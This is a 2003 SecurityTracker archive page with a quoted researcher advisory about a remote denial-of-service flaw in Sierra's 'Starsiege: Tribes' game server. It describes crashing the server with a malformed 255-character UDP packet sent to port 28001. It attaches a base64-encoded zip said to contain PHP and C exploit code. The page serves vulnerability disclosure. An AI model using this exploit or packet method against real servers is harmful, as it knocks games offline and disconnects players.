SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Game)  >   Starsiege Tribes Vendors:   Sierra Entertainment, Inc.
Sierra Starsiege Tribes Game Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1007192
SecurityTracker URL:  http://securitytracker.com/id/1007192
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 14 2003
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A denial of service vulnerability was reported in Sierra's 'Starsiege: Tribes' game. A remote user can crash the game.

It is reported that a remote user can send a malformed UDP packet containing 255 arbitrary characters to the target system on the game port to cause the target system's game to crash. The game play and players are reportedly lost when the system crashes.

On systems that use the vendor-supplied 'InfiniteSpawn.exe' program, the game service will be reloaded automatically. Otherwise, the game service must be manually restarted to return to normal operations.

Other 'Tribes' related games were not tested.

A demonstration exploit is provided in the Source Message [it is a Base64-encoded zip file].

The vendor has reportedly been notified.

Impact:   A remote user can cause the game to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.sierra.com/product.do?gamePlatformId=286 (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Any)
Underlying OS Comments:  Tested on Windows 2000

Message History:   None.


 Source Message Contents

Subject:  StarSiege: Tribes DoS


------=_NextPart_000_002F_01C349F7.4BDC89C0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Advisory Name: "Starsiege: Tribes" DoS
Release Date: 07/14/2003
Discovered: 06/09/2003
Application: Tribes.exe
Platform: PC with Windows 2k; others not tested
Severity: High
Discovery: JadaCyruS <jadacyrus@fsix.net>
Author: st0ic <st0ic@fsix.net>
Vendor: Sierra Entertainment - http://www.sierra.com/

Overview:
     Sierra's "StarSiege: Tribes" game is vulnerable to a DoS (Denial of
Service) attack when running.

Technical Overview:
     This vulnerability is exploited by sending a malformed UDP
(User-Datagram
Protocol) packet containing 255 arbitrary characters to the affected host on
the
game port (usually 28001) causing the host server to crash. If The server is
running with help from InfiniteSpawn.exe, a program provided by the vendor
that
re-spawns the server when terminated, the server will be re-activated, but
all
previous game play and players are lost and disconnected.

Fix:
     Contacted Sierra over a month ago and we were "forwarded to their
database
admin" from which we received no further feedback. So, no vendor fix
available.

Exploit:
     Attached PHP and C source code files.

Notes:
     Tribes 2 (PC) and Tribes Aerial Assault (Playstation 2) are untested as
no
one at Fsix owns a copy of them. Lets hope there not vuln.

-st0ic
[http://www.fsix.net/]

------=_NextPart_000_002F_01C349F7.4BDC89C0
Content-Type: application/x-zip-compressed;
	name="byebye_tribes.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="byebye_tribes.zip"

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
